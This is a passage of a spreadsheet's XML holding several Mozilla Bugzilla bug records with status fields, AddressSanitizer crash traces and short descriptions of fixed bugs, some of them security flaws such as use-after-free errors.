          <t>2024-05-30 08:02:52 -0700</t>
        </is>
      </c>
      <c r="E1590" t="n">
        <v>1</v>
      </c>
      <c r="F1590" t="n">
        <v>1</v>
      </c>
      <c r="G1590" t="n">
        <v>3</v>
      </c>
      <c r="H1590" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1590" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1590" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1590" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1590" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1590" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1590" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1590" t="inlineStr">
        <is>
          <t>[asan][adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q1590" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1590" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1590" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T1590" t="n">
        <v>1</v>
      </c>
      <c r="U1590" t="n">
        <v>0</v>
      </c>
      <c r="V1590" t="n">
        <v>14</v>
      </c>
      <c r="W1590" t="inlineStr">
        <is>
          <t>Created attachment 748364
Testcase
==8886== ERROR: AddressSanitizer: heap-use-after-free on address 0x601c0009a3e0 at pc 0x7ffc01ebdca5 bp 0x7fff2ec8f5f0 sp 0x7fff2ec8f5e8
READ of size 8 at 0x601c0009a3e0 thread T0
    #0 0x7ffc01ebdca4 in nsINode::GetParentNode() const ../../dist/include/nsINode.h:762
    #1 0x7ffc03b3f9ec in nsIDocument::GetRootElement() const content/base/src/nsDocument.cpp:3610
    #2 0x7ffc03b948d5 in nsIDocument::GetHtmlElement() const content/base/src/nsDocument.cpp:5819
    #3 0x7ffc03b94bee in nsIDocument::GetHtmlChildElement(nsIAtom*) content/base/src/nsDocument.cpp:5828
    #4 0x7ffc01f37dd5 in nsIDocument::GetBodyElement() ../../dist/include/nsIDocumentInlines.h:15
    #5 0x7ffc05a4a9b6 in nsHTMLDocument::GetBody() content/html/document/src/nsHTMLDocument.cpp:1085
    #6 0x7ffc05a4af0d in nsHTMLDocument::GetBody(nsIDOMHTMLElement**) content/html/document/src/nsHTMLDocument.cpp:1106
    #7 0x7ffc05a4b382 in non-virtual thunk to nsHTMLDocument::GetBody(nsIDOMHTMLElement**) content/html/document/src/nsHTMLDocument.cpp:1109
    #8 0x7ffc07b29165 in nsHTMLEditor::GetBodyElement(nsIDOMHTMLElement**) editor/libeditor/html/nsHTMLEditor.cpp:5288
    #9 0x7ffc07b281bf in nsHTMLEditor::GetRootElement(nsIDOMElement**) editor/libeditor/html/nsHTMLEditor.cpp:336
    #10 0x7ffc07b856bc in nsHTMLEditor::ResetRootElementAndEventTarget() editor/libeditor/html/nsHTMLEditor.cpp:5259
    #11 0x7ffc07bc544a in nsRunnableMethodImpl&lt;void (nsHTMLEditor::*)(), true&gt;::Run() ../../../dist/include/nsThreadUtils.h:350
    #12 0x7ffc0397bd4a in nsContentUtils::RemoveScriptBlocker() content/base/src/nsContentUtils.cpp:4971
    #13 0x7ffc03b631f3 in nsDocument::EndUpdate(unsigned int) content/base/src/nsDocument.cpp:4342
    #14 0x7ffc05a6b7c1 in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2580
    #15 0x7ffc02793151 in mozAutoDocUpdate::~mozAutoDocUpdate() content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:38
    #16 0x7ffc027657ee in mozAutoDocUpdate::~mozAutoDocUpdate() content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:36
    #17 0x7ffc03b2d819 in nsDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/base/src/nsDocument.cpp:2074
    #18 0x7ffc05a34b3e in nsHTMLDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/html/document/src/nsHTMLDocument.cpp:294
    #19 0x7ffc03b2c47d in nsDocument::Reset(nsIChannel*, nsILoadGroup*) content/base/src/nsDocument.cpp:2012
    #20 0x7ffc05a34692 in nsHTMLDocument::Reset(nsIChannel*, nsILoadGroup*) content/html/document/src/nsHTMLDocument.cpp:281
    #21 0x7ffc05a558fd in nsHTMLDocument::Open(JSContext*, nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) content/html/document/src/nsHTMLDocument.cpp:1687
    #22 0x7ffc0d6a2ff6 in mozilla::dom::HTMLDocumentBinding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, unsigned int, JS::Value*) objdir-ff-asan-sym/dom/bindings/HTMLDocumentBinding.cpp:524
    #23 0x7ffc0d68eba5 in mozilla::dom::HTMLDocumentBinding::genericMethod(JSContext*, unsigned int, JS::Value*) objdir-ff-asan-sym/dom/bindings/HTMLDocumentBinding.cpp:1545
    #24 0x7ffc172428ef in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:337
    #25 0x7ffc172428ef in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:426
    #26 0x7ffc1721befe in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2393
    #27 0x7ffc171cb0be in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:383
    #28 0x7ffc17242f98 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:440
    #29 0x7ffc17246f5b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:473
    #30 0x7ffc16b72040 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) js/src/jsapi.cpp:5851
    #31 0x7ffc0913a469 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJSClass.cpp:1435
    #32 0x7ffc090ec13c in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJS.cpp:578
    #33 0x7ffc0f776394 in PrepareAndDispatch xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #34 0x7ffc0f77344a in SharedStub
0x601c0009a3e0 is located 32 bytes inside of 160-byte region [0x601c0009a3c0,0x601c0009a460)
freed by thread T0 here:
    #0 0x41a9e2 in __interceptor_free
    #1 0x7ffc1fff36de in moz_free memory/mozalloc/mozalloc.cpp:48
    #2 0x7ffc055f9ef9 in operator delete(void*) ../../../../dist/include/mozilla/mozalloc.h:225
    #3 0x7ffc055f9ef9 in mozilla::dom::HTMLSharedElement::~HTMLSharedElement() content/html/content/src/HTMLSharedElement.cpp:28
    #4 0x7ffc03f12bb5 in nsNodeUtils::LastRelease(nsINode*) content/base/src/nsNodeUtils.cpp:258
    #5 0x7ffc041bfe9a in mozilla::dom::FragmentOrElement::Release() content/base/src/FragmentOrElement.cpp:1713
    #6 0x7ffc055fa925 in mozilla::dom::HTMLSharedElement::Release() content/html/content/src/HTMLSharedElement.cpp:32
    #7 0x7ffc0021450a in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) objdir-ff-asan-sym/media/webrtc/signaling/signaling_ecc/../../../../dist/include/nsCOMPtr.h:470
    #8 0x7ffc0f2a8f72 in nsCOMPtr_base::assign_with_AddRef(nsISupports*) objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:49
    #9 0x7ffc03a2bfc4 in nsCOMPtr&lt;mozilla::dom::Element&gt;::operator=(mozilla::dom::Element*) ../../../../dist/include/nsCOMPtr.h:664
    #10 0x7ffc07b8544a in nsHTMLEditor::ResetRootElementAndEventTarget() editor/libeditor/html/nsHTMLEditor.cpp:5251
    #11 0x7ffc07bc544a in nsRunnableMethodImpl&lt;void (nsHTMLEditor::*)(), true&gt;::Run() ../../../dist/include/nsThreadUtils.h:350
    #12 0x7ffc0397bd4a in nsContentUtils::RemoveScriptBlocker() content/base/src/nsContentUtils.cpp:4971
    #13 0x7ffc03b631f3 in nsDocument::EndUpdate(unsigned int) content/base/src/nsDocument.cpp:4342
    #14 0x7ffc05a6b7c1 in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2580
    #15 0x7ffc02793151 in mozAutoDocUpdate::~mozAutoDocUpdate() content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:38
    #16 0x7ffc027657ee in mozAutoDocUpdate::~mozAutoDocUpdate() content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:36
    #17 0x7ffc03b2d819 in nsDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/base/src/nsDocument.cpp:2074
    #18 0x7ffc05a34b3e in nsHTMLDocument::ResetToURI(nsIURI*, nsILoadGroup*, nsIPrincipal*) content/html/document/src/nsHTMLDocument.cpp:294
    #19 0x7ffc03b2c47d in nsDocument::Reset(nsIChannel*, nsILoadGroup*) content/base/src/nsDocument.cpp:2012
    #20 0x7ffc05a34692 in nsHTMLDocument::Reset(nsIChannel*, nsILoadGroup*) content/html/document/src/nsHTMLDocument.cpp:281
    #21 0x7ffc05a558fd in nsHTMLDocument::Open(JSContext*, nsAString_internal const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) content/html/document/src/nsHTMLDocument.cpp:1687
    #22 0x7ffc0d6a2ff6 in mozilla::dom::HTMLDocumentBinding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, unsigned int, JS::Value*) objdir-ff-asan-sym/dom/bindings/HTMLDocumentBinding.cpp:524
    #23 0x7ffc0d68eba5 in mozilla::dom::HTMLDocumentBinding::genericMethod(JSContext*, unsigned int, JS::Value*) objdir-ff-asan-sym/dom/bindings/HTMLDocumentBinding.cpp:1545
    #24 0x7ffc172428ef in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:337
    #25 0x7ffc172428ef in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:426
    #26 0x7ffc1721befe in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2393
    #27 0x7ffc171cb0be in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:383
    #28 0x7ffc17242f98 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:440
    #29 0x7ffc17246f5b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:473
    #30 0x7ffc16b72040 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) js/src/jsapi.cpp:5851
    #31 0x7ffc0913a469 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJSClass.cpp:1435
previously allocated by thread T0 here:
    #0 0x41aac2 in malloc
    #1 0x7ffc1fff3825 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7ffc055f9b9e in operator new(unsigned long) ../../../../dist/include/mozilla/mozalloc.h:201
    #3 0x7ffc055f9b9e in nsGenericHTMLElement* mozilla::dom::NewHTMLElementHelper::Create&lt;nsHTMLSharedElement, mozilla::dom::HTMLSharedElement&gt;(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::NewHTMLElementHelper::SFINAE&lt;bool (*)(nsIDocument*), mozilla::dom::HTMLSharedElement::InNavQuirksMode&gt;*) content/html/content/src/nsGenericHTMLElement.h:1869
    #4 0x7ffc055f99ab in NS_NewHTMLSharedElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/content/src/HTMLSharedElement.cpp:20
    #5 0x7ffc05a01d8e in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:498
    #6 0x7ffc05a025b5 in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:481
    #7 0x7ffc03ee0d9a in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) content/base/src/nsNameSpaceManager.cpp:192
    #8 0x7ffc079ac890 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:349
    #9 0x7ffc079cb355 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:557
    #10 0x7ffc07a05962 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:125
    #11 0x7ffc0f64ede7 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:627
    #12 0x7ffc0f2ebf82 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #13 0x7ffc09c2d27b in nsXULWindow::ShowModal() xpfe/appshell/src/nsXULWindow.cpp:362
    #14 0x7ffc09c0c667 in nsContentTreeOwner::ShowAsModal() xpfe/appshell/src/nsContentTreeOwner.cpp:522
    #15 0x7ffc09c0c818 in non-virtual thunk to nsContentTreeOwner::ShowAsModal() xpfe/appshell/src/nsContentTreeOwner.cpp:523
    #16 0x7ffc09a297e0 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) embedding/components/windowwatcher/src/nsWindowWatcher.cpp:1007
    #17 0x7ffc09a1d0a4 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) embedding/components/windowwatcher/src/nsWindowWatcher.cpp:343
    #18 0x7ffc0f770ceb in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #19 0x7ffc0917c44f in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:2948
    #20 0x7ffc0917c44f in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:2283
    #21 0x7ffc0917c44f in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2249
    #22 0x7ffc091d5f41 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1485
    #23 0x7ffc172428ef in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:337
    #24 0x7ffc172428ef in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:426
    #25 0x7ffc1721befe in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2393
    #26 0x7ffc171cb0be in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:383
    #27 0x7ffc17242f98 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:440
    #28 0x7ffc17246f5b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:473
    #29 0x7ffc16b72040 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) js/src/jsapi.cpp:5851
    #30 0x7ffc0913a469 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJSClass.cpp:1435
    #31 0x7ffc090ec13c in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) js/xpconnect/src/XPCWrappedJS.cpp:578
    #32 0x7ffc0f776394 in PrepareAndDispatch xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #33 0x7ffc0f77344a in SharedStub
Shadow bytes around the buggy address:
  0x0c040000b420: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c040000b430: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c040000b440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c040000b450: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c040000b460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c040000b470: fa fa fa fa fa fa fa fa fd fd fd fd[fd]fd fd fd
  0x0c040000b480: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c040000b490: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c040000b4a0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c040000b4b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c040000b4c0: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==8886== ABORTING</t>
        </is>
      </c>
      <c r="X1590" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" t="n">
        <v>611688</v>
      </c>
      <c r="B1591" t="inlineStr">
        <is>
          <t>2010-11-12 08:22:36 -0800</t>
        </is>
      </c>
      <c r="C1591" t="inlineStr">
        <is>
          <t>Discussion threads on KB articles not rendering chars nicely</t>
        </is>
      </c>
      <c r="D1591" t="inlineStr">
        <is>
          <t>2010-11-17 16:25:11 -0800</t>
        </is>
      </c>
      <c r="E1591" t="n">
        <v>1</v>
      </c>
      <c r="F1591" t="n">
        <v>1</v>
      </c>
      <c r="G1591" t="n">
        <v>5</v>
      </c>
      <c r="H1591" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1591" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1591" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1591" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1591" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1591" t="inlineStr"/>
      <c r="Q1591" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1591" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1591" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T1591" t="n">
        <v>1</v>
      </c>
      <c r="U1591" t="n">
        <v>0</v>
      </c>
      <c r="V1591" t="n">
        <v>4</v>
      </c>
      <c r="W1591" t="inlineStr">
        <is>
          <t>Discussion threads on KB articles is not playing nicely with any non-EN numbers and letters.
1) https://master.support.mozilla.com/en-US/kb/foooo/discuss
2) post reply: 私は今日ゆっくりしてます。　(・_・)ノ
expected: the above
actual: see link, '????????'</t>
        </is>
      </c>
      <c r="X1591" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" t="n">
        <v>1258231</v>
      </c>
      <c r="B1592" t="inlineStr">
        <is>
          <t>2016-03-20 16:04:54 -0700</t>
        </is>
      </c>
      <c r="C1592" t="inlineStr">
        <is>
          <t>crash in nsConsoleService::ClearMessagesForWindowID</t>
        </is>
      </c>
      <c r="D1592" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:44 -0700</t>
        </is>
      </c>
      <c r="E1592" t="n">
        <v>1</v>
      </c>
      <c r="F1592" t="n">
        <v>1</v>
      </c>
      <c r="G1592" t="n">
        <v>3</v>
      </c>
      <c r="H1592" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1592" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1592" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1592" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1592" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1592" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1592" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1592" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1592" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q1592" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1592" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1592" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T1592" t="n">
        <v>1</v>
      </c>
      <c r="U1592" t="n">
        <v>0</v>
      </c>
      <c r="V1592" t="n">
        <v>21</v>
      </c>
      <c r="W1592" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-7db23744-0e54-43f8-b1bf-0b2b52160315.
=============================================================
Crash is on a line last touched by froyd in bug 1189829; the bug might pre-exist that change however.
UAF signature, with ~1000 crashes in the last week.  Likely a sec-crit; certainly a sec-high</t>
        </is>
      </c>
      <c r="X1592" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" t="n">
        <v>834526</v>
      </c>
      <c r="B1593" t="inlineStr">
        <is>
          <t>2013-01-24 17:06:10 -0800</t>
        </is>
      </c>
      <c r="C1593" t="inlineStr">
        <is>
          <t>IPC Channel uses debug-only check for number of FDs in a single message, could overwrite stack</t>
        </is>
      </c>
      <c r="D1593" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:47 -0800</t>
        </is>
      </c>
      <c r="E1593" t="n">
        <v>1</v>
      </c>
      <c r="F1593" t="n">
        <v>1</v>
      </c>
      <c r="G1593" t="n">
        <v>3</v>
      </c>
      <c r="H1593" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1593" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1593" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K1593" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1593" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1593" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1593" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1593" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q1593" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1593" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1593" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1593" t="n">
        <v>1</v>
      </c>
      <c r="U1593" t="n">
        <v>0</v>
      </c>
      <c r="V1593" t="n">
        <v>7</v>
      </c>
      <c r="W1593" t="inlineStr">
        <is>
          <t>Created attachment 706173
Patch, v1
IPC Channel uses a debug-only check for number of FDs that may be transmitted in a single message. That's currently |FileDescriptorSet::MAX_DESCRIPTORS_PER_MESSAGE| (currently 4 in our code, 5 in chromium tip). It uses this to allocate some stack space, and if we exceed this limit then we will overwrite the stack.</t>
        </is>
      </c>
      <c r="X1593" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" t="n">
        <v>3629</v>
      </c>
      <c r="B1594" t="inlineStr">
        <is>
          <t>1999-03-11 10:50:26 -0800</t>
        </is>
      </c>
      <c r="C1594" t="inlineStr">
        <is>
          <t>[PP]Autoregistration problems on the mac</t>
        </is>
      </c>
      <c r="D1594" t="inlineStr">
        <is>
          <t>2008-07-31 02:39:07 -0700</t>
        </is>
      </c>
      <c r="E1594" t="n">
        <v>1</v>
      </c>
      <c r="F1594" t="n">
        <v>1</v>
      </c>
      <c r="G1594" t="n">
        <v>3</v>
      </c>
      <c r="H1594" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1594" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1594" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1594" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1594" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1594" t="inlineStr">
        <is>
          <t>Mac System 8.0</t>
        </is>
      </c>
      <c r="N1594" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1594" t="inlineStr"/>
      <c r="Q1594" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1594" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1594" t="inlineStr">
        <is>
          <t>M8</t>
        </is>
      </c>
      <c r="T1594" t="n">
        <v>1</v>
      </c>
      <c r="U1594" t="n">
        <v>0</v>
      </c>
      <c r="V1594" t="n">
        <v>8</v>
      </c>
      <c r="W1594" t="inlineStr">
        <is>
          <t>per Robert churchill
--------------------
Are you using McMullen's nsFileSpec stuff yet?  Its probably a good idea to try
and switch over soon.  Here's (I believe) the
scenario on the Mac... you check inside of the components directory for DLLs
which end in ".shlb" (on the Mac). You check
their file size and mod date to see if they've changed. Unfortunately, on the
Mac, you are checking aliases to the DLLs and not
the DLLs themselves... so, unless your code is resolving aliases before doing
the stat, its not working correctly.
(The code we added into NSPR to resolve aliases was only for PR_LoadLibrary(),
not anything else.)
Thought I'd mention it.  :^)
Robert</t>
        </is>
      </c>
      <c r="X1594" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" t="n">
        <v>1677194</v>
      </c>
      <c r="B1595" t="inlineStr">
        <is>
          <t>2020-11-13 12:05:02 -0800</t>
        </is>
      </c>
      <c r="C1595" t="inlineStr">
        <is>
          <t>ASAN error, use-after-poison, nsTreeBodyFrame::RowCountChanged(int, int)</t>
        </is>
      </c>
      <c r="D1595" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:12 -0800</t>
        </is>
      </c>
      <c r="E1595" t="n">
        <v>1</v>
      </c>
      <c r="F1595" t="n">
        <v>1</v>
      </c>
      <c r="G1595" t="n">
        <v>3</v>
      </c>
      <c r="H1595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1595" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1595" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1595" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1595" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1595" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1595" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main85+]</t>
        </is>
      </c>
      <c r="Q1595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1595" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T1595" t="n">
        <v>1</v>
      </c>
      <c r="U1595" t="n">
        <v>0</v>
      </c>
      <c r="V1595" t="n">
        <v>26</v>
      </c>
      <c r="W1595" t="inlineStr">
        <is>
          <t>Created attachment 9187752
ASAN error log for use-after-poison
I noticed a use-after-poison error when I ran
ASAN-version of C-C TB under its mochitest test suite
locally.
The full log is attached.
The line numbers may be slightly off due to local patches.
The error is detected during
test_delete_last_message_from_virtual_folder_closes_message_displays test
in
comm/mail/test/browser/folder-display/browser_deletionFromVirtualFolders.js
I think it relates to
